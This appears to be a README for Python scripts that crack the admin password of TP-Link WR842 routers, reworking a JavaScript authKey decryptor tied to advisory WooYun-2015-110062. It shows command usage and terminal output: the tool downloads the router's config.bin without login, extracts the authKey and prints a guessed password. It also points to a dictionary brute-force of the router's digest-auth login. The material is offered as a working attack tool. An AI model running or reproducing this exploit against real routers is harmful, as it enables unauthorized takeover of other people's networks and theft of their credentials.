some scripts for crack router.
For cracking the password of the tplink wr842 router.
According to 'WooYun-2015-110062', modified from the auth_key calculator (Thanks to the author:青岛小哥).
I transformed the decrypt section of the original file ,which written in html and javascript.
It's not difficult to transform javascript to python,and I also learnt some tips:
new Array(15),inpython,it should be[[0 for i in xrange(15)] for i in range(15)]for(var i=0;i<15;i++),inpython,it'sfor i in xrange(0,15):,easy.str.charAt(index),inpython,it's juststr[index].str.charCodeAt(index),inpython,we can useord(str(i)).String.fromCharCode(i),inpython,we can usechr(i).WhileString.fromCharCode(i)is reverse tostr.charCodeAt(index),chr(i)is the reverse function oford(str(i)).
More informaiton about the bug,see this cache page WooYun-2015-110062 .
└─[$] <> python wr842.py -h
usage: wr842.py [-h] [-u URL] [-k AUTHKEY]
optional arguments:
-h, --help show this help message and exit
-u URL the url of router
-k AUTHKEY authKey└─[$] <> python wr842.py -u 192.168.0.1
--2017-08-02 01:27:59-- http://192.168.0.1/config.bin
Connecting to 192.168.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19728 (19K) [x-bin/octet-stream]
Saving to: ‘/tmp/config.bin’
/tmp/config.bin 100%[===================>] 19.27K --.-KB/s in 0.03s
2017-08-02 01:27:59 (578 KB/s) - ‘/tmp/config.bin’ saved [19728/19728]
[*] get config.bin!
[*] get authKey!
[*] authKey:0rZily4W9TefbwK
(1;JW
9t{
8
(3S^
0H
+9Nf
1Phu}
7c
or
└─[$] <> python wr842.py -k 0rZily4W9TefbwK
(1;JW
9t{
8
(3S^
0H
+9Nf
1Phu}
7c
guess password: 19830917
Bruteforce crack to digest auth of router login.
you can get some dict_file from "dict.rar".
